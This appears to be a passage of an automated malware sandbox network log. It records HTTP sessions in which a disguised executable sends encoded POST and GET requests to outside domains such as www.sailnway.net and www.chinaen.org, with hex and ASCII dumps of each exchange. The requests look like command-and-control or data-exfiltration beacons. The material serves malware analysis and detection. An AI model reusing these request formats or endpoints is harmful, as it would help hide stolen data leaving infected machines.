Sep 5, 2024 09:07:33.552299023 CEST	568	IN	Data Raw: 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu+6Zh8/8YqB01FuO+DLXf0tlFHyR0DQ5uHVkhjJ85CmXcOpGqCMWGlbfbEQkZLHfLKViDcC/h13rX0D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49195	85.159.66.93	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:38.717580080 CEST	2472	OUT	POST /lrst/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.sailnway.net Origin: http://www.sailnway.net Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.sailnway.net/lrst/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 52 74 38 69 31 38 64 73 37 33 65 4f 72 54 68 56 41 6d 63 57 74 6c 6e 63 46 77 35 52 65 73 39 56 43 33 4e 6d 50 62 61 65 30 58 42 50 41 2f 33 30 61 32 47 67 74 76 72 43 6f 75 56 44 74 49 39 6e 6e 54 43 51 76 4a 47 30 54 32 4c 79 4c 67 75 63 50 38 78 51 35 31 64 38 6a 66 44 66 51 57 6f 42 32 67 6c 63 61 6e 37 31 79 73 4d 59 79 50 51 43 54 56 49 36 36 4a 70 32 4a 30 4e 69 65 63 31 65 51 38 39 50 37 2b 38 4c 48 79 44 42 75 73 47 46 6b 42 32 44 6d 47 6b 79 4e 57 36 62 4c 4f 6a 74 38 41 57 56 2f 38 39 2f 6d 49 44 31 37 6d 57 63 4c 6f 4d 76 65 75 62 68 4b 65 32 59 62 59 67 43 53 69 62 68 46 70 39 72 63 64 75 4c 33 76 70 31 7a 61 56 6e 6c 30 6a 7a 30 6b 4d 31 33 42 64 51 6d 6c 72 43 4e 64 32 65 64 2b 78 71 4c 48 58 36 6c 6d 72 31 6e 75 74 71 78 31 4e 2b 64 37 39 6e 42 58 71 6f 34 58 35 42 52 69 53 6f 49 48 56 75 76 59 58 41 47 49 58 57 6b 4c 79 4b 76 4e 36 30 78 2f 7a 65 6c 35 56 37 31 62 57 52 34 4d 55 49 63 7a 4c 79 51 45 75 78 74 53 50 77 58 [TRUNCATED] Data Ascii: A8_pSPdX=rBDGnmFpclO/Rt8i18ds73eOrThVAmcWtlncFw5Res9VC3NmPbae0XBPA/30a2GgtvrCouVDtI9nnTCQvJG0T2LyLgucP8xQ51d8jfDfQWoB2glcan71ysMYyPQCTVI66Jp2J0Niec1eQ89P7+8LHyDBusGFkB2DmGkyNW6bLOjt8AWV/89/mID17mWcLoMveubhKe2YbYgCSibhFp9rcduL3vp1zaVnl0jz0kM13BdQmlrCNd2ed+xqLHX6lmr1nutqx1N+d79nBXqo4X5BRiSoIHVuvYXAGIXWkLyKvN60x/zel5V71bWR4MUIczLyQEuxtSPwXkOOhZdCEiEAODrQJN9THQXD23if+dKyyhfOjS6wsTIYPk4lyjmxqIj2W/IYmwBByOJ8t2KJsZKmMgQPgweZ8cxJRAPmAWYbHTB78zt1VAcVk87IHyxy029+YcMJSO+Cb5Oj1lauqECvOAjKy6OXXHzqpW9TSrFB/pBoSOpyS4Wz6wENZWSorFAOS8QkHaD0WWD2sCRUmfPS/yYIy/ssuzov/KGguoYLJPrAM1jrN2JGSEDqqUt88cSGydwcVQOBXDgNZ0p79+wVT76ltTsd0QximOV6GsqyPFjPHtYDX8NOZG3SVD0RWule7WntuGlQbwUFvGkyYE5TFJgFAS7AigmQnaHjc2R1xgAnQ7z1tTvq4JF1v7RoGsT0fsPidEE6fPfadoKWyP6DEmGnvw/nDB26p2WlstmzX/0/RHSgRIOMi7nzeqSD3EKhm9UEiFYKgnPjFXZUgH7z4g98E7wGhlf9yZvnYjh5AgP9PSRDoXh7fgXNHy7MgspJY2EO1ucgCSsugbshM9cVFSyLiQ1sYeY6KXp3PAtCpr8goMJUq3E+flndnM/jbrXU0I7s9M5MJOwA6RLN0L12dF1rBj2YViJ6Fsbw7xxPHVQul9kI1tZTfaRRF/AOq7euomRXvfsp44dxFUZVnbNMOBQVue3DLZM0GapP0QZssbx [TRUNCATED]
Sep 5, 2024 09:07:38.722588062 CEST	301	OUT	Data Raw: 37 70 4a 42 75 6e 48 57 4a 50 52 4b 46 43 73 51 61 4b 58 2b 2f 6a 6b 6c 6d 6b 59 70 58 6d 69 31 32 33 74 4f 54 72 6c 46 65 69 65 54 66 38 36 62 69 58 2b 61 59 49 33 76 4d 54 49 44 78 2b 71 47 4a 7a 6a 71 5a 52 31 43 55 71 2b 34 6b 2f 53 4a 46 50 Data Ascii: 7pJBunHWJPRKFCsQaKX+/jklmkYpXmi123tOTrlFeieTf86biX+aYI3vMTIDx+qGJzjqZR1CUq+4k/SJFPfIJjUBl9FzsXMI3DKphAw9KCsm6rS3xCJO9/DWHfa+jsoedMKqbLBLwlMvsCnybgzl6hgish1ZlKlObukSbvPC6a+cjxsQ6XkGLFvxMGSakw2Rr2rAPt2ESmhJHU6YAgBam++qX7WnZK1bc/p5mYd2NTsjM11Enod
Sep 5, 2024 09:07:39.404082060 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Thu, 05 Sep 2024 07:07:39 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-09-05T07:07:44.2919526Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49196	85.159.66.93	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:41.271306992 CEST	2472	OUT	POST /lrst/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.sailnway.net Origin: http://www.sailnway.net Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.sailnway.net/lrst/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 42 56 43 30 46 6d 4f 4c 61 65 31 58 42 4d 65 76 33 30 61 32 47 76 74 72 44 53 6f 75 5a 54 74 4e 68 6e 6e 53 43 51 76 49 47 30 65 6d 4c 79 47 41 75 65 50 38 39 71 35 31 42 67 6a 65 65 58 51 51 77 42 33 53 74 63 62 44 62 71 70 4d 4d 53 77 50 51 5a 54 55 31 4f 36 4a 78 6d 4a 78 56 79 65 62 6c 65 51 73 39 50 79 75 38 4d 46 79 44 49 71 73 47 4c 6b 41 4b 2b 6d 47 6b 32 4e 57 66 4f 4c 4f 66 74 75 6a 65 56 2f 37 68 38 36 6f 44 32 32 47 57 63 50 6f 4d 58 65 75 61 67 4b 65 32 59 62 59 63 43 44 69 62 68 46 6f 39 6f 42 74 75 4c 2f 50 70 7a 39 36 5a 5a 6c 30 6e 73 30 6b 39 49 69 6d 6c 51 6e 67 33 43 62 39 32 65 63 4f 78 6f 4c 48 57 6c 76 47 72 2b 6e 75 31 59 78 31 63 7a 64 37 39 6e 42 52 2b 6f 79 6b 42 42 58 79 53 6f 4b 48 56 76 35 6f 58 42 47 49 62 6f 6b 4c 32 4b 76 49 57 30 78 4e 37 65 30 62 39 38 74 62 57 51 38 4d 55 4b 4c 6a 4c 6e 51 41 4f 4c 74 54 32 6e 58 [TRUNCATED] Data Ascii: A8_pSPdX=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5RetBVC0FmOLae1XBMev30a2GvtrDSouZTtNhnnSCQvIG0emLyGAueP89q51BgjeeXQQwB3StcbDbqpMMSwPQZTU1O6JxmJxVyebleQs9Pyu8MFyDIqsGLkAK+mGk2NWfOLOftujeV/7h86oD22GWcPoMXeuagKe2YbYcCDibhFo9oBtuL/Ppz96ZZl0ns0k9IimlQng3Cb92ecOxoLHWlvGr+nu1Yx1czd79nBR+oykBBXySoKHVv5oXBGIbokL2KvIW0xN7e0b98tbWQ8MUKLjLnQAOLtT2nXl+OhbFCLjEAOzrfAt9XNwb523q1+dPQyirOhHOw8xQZTk4j1jmBuIiNW/M6myJBx/B8s2qJ9YLwOQQMkwfBy8xdRAb+AXILGhZ79Dt1YCkK887NLSxe+W9SYcN4SPe0bM6j1kqurXqvOAjJ36OVdn+QpWhfSvhR/oxoTdByS9izzwENBmThglA+S8ESHabeWmn2vk9U2p7SqCYK0/stqzpH/KWgusAbJODAMUjrMTlGT0Dun0tj8cT1yd0uVQf0XFINZ1p71bMVLr6grTsZ+wxRmINqGsXlPHDPVc0DRNNOL23QbT0RAel87W/9uC9qbxsFzn0yJE5UfZgaCS7H0gmCnaXjc2d1xkEnQIb1pivq65FNhbR2PMfQfoqRdFwUfOzac8eWmZGEaGGt6A/9VB2Bp2WhsvWjXKI/RXygTt6Pgbn4QKSY5kLWm9FviAwkgQ/jFWJUj1jz/Q98E7wZhlf5yYTVYmFXAgP9NH9DoEJ7QAXIbC7LkspDY2Qa1uF1CSAuhLMhM9cWLCyIqw1rYeVYKXpNPAhCp9kg5PBUrVs+NFnd3c/gC7XR0I6p9JRiJLEA7hrN15N1e11QJD2OMSFfFsXW70JPHmEuqPMI0dZTc6RSOfAhgbSIoll5ve9u5K1xEiFVhYlPBRQQqe3BLZQHGaxX0TITsc9 [TRUNCATED]
Sep 5, 2024 09:07:41.276314974 CEST	1765	OUT	Data Raw: 55 70 4a 42 36 6e 47 58 4d 50 56 61 46 43 6f 45 61 4a 33 43 2f 6a 45 6c 68 74 34 70 43 6d 69 31 67 33 74 58 7a 72 68 64 77 69 66 44 66 38 64 62 69 62 70 6d 59 4c 48 76 4b 54 49 44 72 7a 4b 43 73 7a 6a 71 2f 52 31 65 55 71 2b 6f 6b 2f 53 70 46 50 Data Ascii: UpJB6nGXMPVaFCoEaJ3C/jElht4pCmi1g3tXzrhdwifDf8dbibpmYLHvKTIDrzKCszjq/R1eUq+ok/SpFPvIK+0Bg4FzrB8JoDKoSAxBgCvq6qBfxF4O9/zXOEK+w9YCPMKWfLEvKk+XsCWOblB96wQitoVZSKlDGukihvOSQas4jjMQ6TnuIXfxVBSapw2QO2rILt3o8mlBHU8MAyRal+OqRomnDK0mX/phIYZaNTovM1VUn/t
Sep 5, 2024 09:07:41.952198982 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Thu, 05 Sep 2024 07:07:41 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-09-05T07:07:44.2919526Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49197	85.159.66.93	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:43.804586887 CEST	557	OUT	GET /lrst/?A8_pSPdX=mDrmkSN/AS2kB6lxw6968UvRuBo2CnIhmXXSSGppVfotDkdoE42/hFN7L43edTGNkqeamvN9p79evl2jiLPZXHCZACLKMeULs3Bzxtr9WkFRvQNQJByT+dkA1Yhl&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.sailnway.net Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:07:44.480700016 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Thu, 05 Sep 2024 07:07:44 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-09-05T07:07:49.3733400Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49198	188.114.96.3	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:49.799566031 CEST	2472	OUT	POST /mquw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.chinaen.org Origin: http://www.chinaen.org Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.chinaen.org/mquw/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 4e 59 42 53 68 6a 4f 6f 48 6e 6a 66 71 50 68 4d 43 48 4c 46 53 41 4f 4a 7a 75 2b 57 6c 50 41 61 6e 62 64 77 52 6e 66 6d 68 66 61 64 47 46 41 65 56 6e 47 41 39 42 36 74 53 57 56 34 39 63 4b 52 43 68 47 43 32 5a 30 6f 44 75 50 71 72 4b 50 70 41 48 6f 64 34 64 48 34 55 68 55 37 2b 76 48 62 77 62 4a 62 47 4a 32 72 39 72 43 72 4e 69 43 66 53 35 46 42 6c 70 6b 74 6d 67 37 43 54 35 63 69 64 45 61 67 66 79 4f 30 59 69 6d 6c 59 77 78 69 50 4c 41 69 63 6c 32 39 64 37 73 34 6c 66 79 4f 47 35 4a 68 61 49 71 58 74 4d 65 78 5a 72 76 65 74 55 76 73 36 75 5a 38 77 4d 2b 4d 74 4e 6a 63 45 64 71 38 54 53 74 64 2b 7a 2b 61 7a 4a 7a 63 4a 31 4f 2f 47 4c 33 6d 5a 32 63 71 75 66 70 4d 73 75 4d 2b 47 68 39 30 56 4a 73 68 6d 4a 6a 48 35 64 4f 65 6c 49 42 54 31 36 63 2f 33 74 4c 4e 2b 4c 42 45 6d 4d 53 6d 59 32 61 66 74 48 64 4b 71 70 53 56 70 74 2b 68 4f 79 4a 7a 46 70 2b 45 47 65 6a 78 49 6f 72 63 34 70 55 63 58 55 47 64 65 61 57 6b 32 78 56 59 57 44 6d 61 [TRUNCATED] Data Ascii: A8_pSPdX=wXJkDQSrfO98ENYBShjOoHnjfqPhMCHLFSAOJzu+WlPAanbdwRnfmhfadGFAeVnGA9B6tSWV49cKRChGC2Z0oDuPqrKPpAHod4dH4UhU7+vHbwbJbGJ2r9rCrNiCfS5FBlpktmg7CT5cidEagfyO0YimlYwxiPLAicl29d7s4lfyOG5JhaIqXtMexZrvetUvs6uZ8wM+MtNjcEdq8TStd+z+azJzcJ1O/GL3mZ2cqufpMsuM+Gh90VJshmJjH5dOelIBT16c/3tLN+LBEmMSmY2aftHdKqpSVpt+hOyJzFp+EGejxIorc4pUcXUGdeaWk2xVYWDmawOnzjek/0V4KkfPuZ4dyZeljCQvZ0G8OgEfd7/2QueyyL4TBuhNl0DJyKTw5O9S/G1hsu/I64oUcTtxAESHnyQWfJ+kh0Ad57sglO/gsgtI1lR2c21NqYvio7T+wkoNZ75e60M5CyYl18yeC0AkD4Jn8X0N3Sq1Lrl/3l4Yv50G3BH2DMfRXrsZDw6lYdIe58pHaPAhHez7XLW1ycsNdrMtziAkgTC/iwUdnTaRsBhU6cIw4Is69mC875jCjhPXh36ARsO18MkOjr14+7VRjbaAg7yyL/cAUamgHoJ+7Ex8ywSjspgcKU5/Ss7v3lW0LYqVHmsiJ/XF1L2o8dyhVrARpetbA+CdaiD9Y99jepAYmL3zni3mVhZR0b5KKvMtQCP7EAR69YDou2vVzgxigrjeIp4nZdrebA9tRGbSCOfQ8SOQUwwd1mhVRC3Xq0i8jHgrnM2OJXxADjri3dfD8Nb/9e6/04/PhLZPMwI8g7WIc0EXYEkYOPDn6KC2/o+CLDkwiBBBkNYcYefGSJSVn94BK0bkPw+/PewSsh2ftsQGBWm+SRodxuD2M7D/CaotpsOpGT3iZsMcPVPXIsI7tjKidAOPj6VvG3eLK7K2JVxhPphKZNQuBS68EzE7thgVlr9wCebMK2/BAUR2IqYP+miB84bPVmv7WUm [TRUNCATED]
Sep 5, 2024 09:07:49.807610989 CEST	298	OUT	Data Raw: 6e 46 42 55 4a 6e 34 6e 51 46 75 58 74 44 75 50 41 42 52 35 6d 35 49 61 51 64 59 73 30 76 41 66 6a 38 75 4e 4f 51 2f 70 49 58 78 4a 54 56 66 61 62 52 6c 42 63 41 72 54 58 4f 4e 4f 2f 47 79 32 43 32 52 34 55 2b 65 75 56 6d 45 70 55 4d 4a 42 56 79 Data Ascii: nFBUJn4nQFuXtDuPABR5m5IaQdYs0vAfj8uNOQ/pIXxJTVfabRlBcArTXONO/Gy2C2R4U+euVmEpUMJBVyhUeZh1Fj8dMO9fbtvhQlpHADY6jc+gersou++0VcMoudoBukbSLdhWV9f+h5d/EXrh9iupbyw+qIhCLrkrDk/mnBv38G/8VbZ9dz+aVShaxd694njx7px3bIPlrGOqOCBhHQSCORv+WUStQDa1eXvFJDKTY5pOAVP
Sep 5, 2024 09:07:51.160207987 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:07:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Product: Z-BlogPHP 1.7.3 X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2umUvE2zDX6DUbixj6JOaPfQJ8o9EfEbqXah%2BIfipLe8Dj7VJURSz%2BL37GkEPpLtgnAozv1Gw24mkovTscXoDBbVNEDBQd8ApobHDmID0EmOJfcpVeF5t2nfVMVWX5TxHnI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8be46276be9e430f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 fb 73 d3 46 fa e7 30 c3 ff b0 d5 75 ea 64 26 96 ec 24 f4 91 da 66 5a a6 d3 7b 97 6b e9 cd cd 71 34 b3 96 d6 f6 82 a4 15 d2 da 21 30 9d 71 4a 12 62 42 1e e5 91 e6 e1 34 04 48 c3 41 f3 00 12 1a f2 fc 63 f0 4a f2 4f f9 17 6e 56 b2 1d 3b 21 0e 50 b8 21 e3 58 de dd ef bd df 63 f7 53 e4 3d 85 c8 b4 cb 40 20 45 35 35 76 f4 48 a4 f2 44 50 e1 4f 0d 51 08 e4 14 34 2d 44 a3 42 9a 26 82 1f 0b 95 79 1d 6a 28 2a 98 48 57 90 89 4c 01 c8 44 a7 48 a7 51 a1 13 c5 cf 61 ba 0b 98 a2 d4 08 a2 f3 69 9c 89 0a ff 0a 7e fb 59 f0 04 d1 0c 48 71 5c 45 55 58 7f fa 22 8a 94 24 6a 96 53 26 d1 50 34 bc 97 11 34 0c 15 cb 30 ae a2 a0 82 32 58 46 42 05 d5 90 9b 35 12 c7 2a da 8b 93 c1 a8 d3 20 26 ad 16 0e 2b 34 15 f5 29 04 bd 41 b3 86 75 ac a5 b5 a0 25 43 15 45 c3 cd 58 c7 14 43 b5 3c f6 88 52 4c 55 14 6b 0b b5 bd 07 d8 e2 b3 c2 ea a0 bb f2 db ce c6 b5 e2 cc 4a 71 ea 8e 9d 7f 60 e7 b6 58 ff 12 08 02 67 68 c0 cd f6 ba 83 77 dd 6c d6 be b9 ee dc 9a 2d 3c 1b 60 0b 4f 23 92 4f e2 e8 91 [TRUNCATED] Data Ascii: a50sF0ud&$fZ{kq4!0qJbB4HAcJOnV;!P!XcS=@ E55vHDPOQ4-DB&yj(HWLDHQai~YHq\EUX"$jS&P4402XFB5 &+4)Au%CEXC<RLUkJq`Xghwl-<`O#Os eDTiNQNa"]$fRH[$BpXDHh$iv"hH.%QRfY@fMl[_-PtJH'U\|H'w3"[,SG($X:{>`'=kH\|f"%u12&gVTH/IRN$N
Sep 5, 2024 09:07:51.160221100 CEST	224	IN	Data Raw: ae d8 d1 23 47 8f 44 14 9c 01 b2 0a 2d 2b 2a 50 62 70 bf 6a a8 9e e3 f1 0c b1 8e 4c 21 16 b1 0c a8 73 62 de 03 c7 22 12 ff 57 70 c6 a3 cb 9f d5 88 9c 0f c7 3a 88 1e f0 01 e2 e4 82 07 53 03 a4 92 24 f1 67 1b 22 b0 be 17 09 b1 08 d6 92 87 59 ae ae Data Ascii: #GD-+PbpjL!sb"Wp:S$g"Ya&%q'U/B}MJ6)f^5aF0Y[4zpi'M=ziA+;x_F3+\X(CUMjYP)@]
Sep 5, 2024 09:07:51.160233974 CEST	1236	IN	Data Raw: f7 92 8b 4e 12 44 55 49 e7 e1 a9 a4 14 1b 1e 91 52 30 40 33 c9 ab 69 47 5c 85 fa 39 21 e6 8c af 17 c7 fb b8 50 65 09 6a f9 5b 08 9a 72 aa 2c 40 82 98 5a a9 b8 95 16 80 86 68 8a 28 51 21 c9 53 1d 94 29 26 fa 81 12 f9 38 5c 90 e3 50 a6 d1 1a da 0d Data Ascii: NDUIR0@3iG\9!Pej[r,@Zh(Q!S)&8\PiZBy*Q27/o}{$/He4D/QqkQTG&e,GOS}u20/D!I5bCmJp:Ji{_&I;xlao9.#
Sep 5, 2024 09:07:51.160247087 CEST	658	IN	Data Raw: ec 64 95 0c e5 b5 5e 65 5d 94 89 b6 7b 5b fb 77 f0 73 95 24 4f fe f1 24 08 8b 1f 89 ad e0 f3 34 56 15 10 fe a8 b5 e5 93 63 fb bd b9 d4 7a 22 06 e2 7d 4a 9d 98 28 91 40 26 7f f7 12 ab 10 e2 16 07 a7 78 43 f1 40 49 78 a8 60 ca 05 11 65 5d 7a 41 43 Data Ascii: d^e]{[ws$O$4Vcz"}J(@&xC@Ix`e]zACjc?f^*w$9EaG PO(6;!/U>7Z2M#WcC8-J;oTNDA1GMR& zj%hI)7C9T$OC7}}eZ
Sep 5, 2024 09:07:51.160516024 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:07:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Product: Z-BlogPHP 1.7.3 X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2umUvE2zDX6DUbixj6JOaPfQJ8o9EfEbqXah%2BIfipLe8Dj7VJURSz%2BL37GkEPpLtgnAozv1Gw24mkovTscXoDBbVNEDBQd8ApobHDmID0EmOJfcpVeF5t2nfVMVWX5TxHnI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8be46276be9e430f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 fb 73 d3 46 fa e7 30 c3 ff b0 d5 75 ea 64 26 96 ec 24 f4 91 da 66 5a a6 d3 7b 97 6b e9 cd cd 71 34 b3 96 d6 f6 82 a4 15 d2 da 21 30 9d 71 4a 12 62 42 1e e5 91 e6 e1 34 04 48 c3 41 f3 00 12 1a f2 fc 63 f0 4a f2 4f f9 17 6e 56 b2 1d 3b 21 0e 50 b8 21 e3 58 de dd ef bd df 63 f7 53 e4 3d 85 c8 b4 cb 40 20 45 35 35 76 f4 48 a4 f2 44 50 e1 4f 0d 51 08 e4 14 34 2d 44 a3 42 9a 26 82 1f 0b 95 79 1d 6a 28 2a 98 48 57 90 89 4c 01 c8 44 a7 48 a7 51 a1 13 c5 cf 61 ba 0b 98 a2 d4 08 a2 f3 69 9c 89 0a ff 0a 7e fb 59 f0 04 d1 0c 48 71 5c 45 55 58 7f fa 22 8a 94 24 6a 96 53 26 d1 50 34 bc 97 11 34 0c 15 cb 30 ae a2 a0 82 32 58 46 42 05 d5 90 9b 35 12 c7 2a da 8b 93 c1 a8 d3 20 26 ad 16 0e 2b 34 15 f5 29 04 bd 41 b3 86 75 ac a5 b5 a0 25 43 15 45 c3 cd 58 c7 14 43 b5 3c f6 88 52 4c 55 14 6b 0b b5 bd 07 d8 e2 b3 c2 ea a0 bb f2 db ce c6 b5 e2 cc 4a 71 ea 8e 9d 7f 60 e7 b6 58 ff 12 08 02 67 68 c0 cd f6 ba 83 77 dd 6c d6 be b9 ee dc 9a 2d 3c 1b 60 0b 4f 23 92 4f e2 e8 91 [TRUNCATED] Data Ascii: a50sF0ud&$fZ{kq4!0qJbB4HAcJOnV;!P!XcS=@ E55vHDPOQ4-DB&yj(HWLDHQai~YHq\EUX"$jS&P4402XFB5 &+4)Au%CEXC<RLUkJq`Xghwl-<`O#Os eDTiNQNa"]$fRH[$BpXDHh$iv"hH.%QRfY@fMl[_-PtJH'U\|H'w3"[,SG($X:{>`'=kH\|f"%u12&gVTH/IRN$N

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.22	49199	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:52.579880953 CEST	2472	OUT	POST /mquw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.chinaen.org Origin: http://www.chinaen.org Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.chinaen.org/mquw/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 76 77 42 65 7a 37 4f 76 48 6e 67 54 4b 50 68 4d 43 48 4a 46 53 41 73 4a 7a 75 2b 57 6b 7a 41 61 6c 54 64 78 42 6e 66 30 52 66 56 58 6d 46 41 65 56 6e 46 41 35 70 71 74 53 61 76 34 2f 6b 4b 52 44 68 47 43 31 78 30 2f 7a 75 50 6f 72 4b 4e 70 41 4c 38 64 34 52 62 34 51 59 42 37 34 2f 48 61 44 6a 4a 57 30 68 31 68 74 71 4c 74 4e 69 53 66 53 31 77 42 6c 67 37 74 6d 31 32 43 51 39 63 69 74 45 61 69 76 79 50 70 49 69 6e 76 34 77 6a 69 50 58 39 69 63 6c 36 39 5a 61 44 34 6c 54 79 50 51 4e 4a 68 64 63 6c 59 64 4d 64 2f 35 72 76 44 39 55 70 73 36 75 46 38 77 4d 2b 4d 74 78 6a 47 30 64 71 38 52 36 71 51 65 7a 2b 56 6a 4a 71 59 4a 4a 77 2f 47 66 5a 6d 63 2b 6d 72 64 54 70 4e 76 57 4d 36 32 68 39 79 6c 4a 31 68 6d 4a 6b 52 4a 64 6f 65 6c 77 6a 54 78 6e 5a 2f 33 74 4c 4e 39 44 42 44 31 6b 53 79 59 32 61 51 4e 48 4e 51 61 70 56 56 70 70 63 68 4f 32 4a 7a 41 46 2b 43 78 36 6a 31 36 41 6f 45 34 70 58 59 58 55 45 57 2b 61 44 6b 32 73 41 59 57 4c 4d 61 [TRUNCATED] Data Ascii: 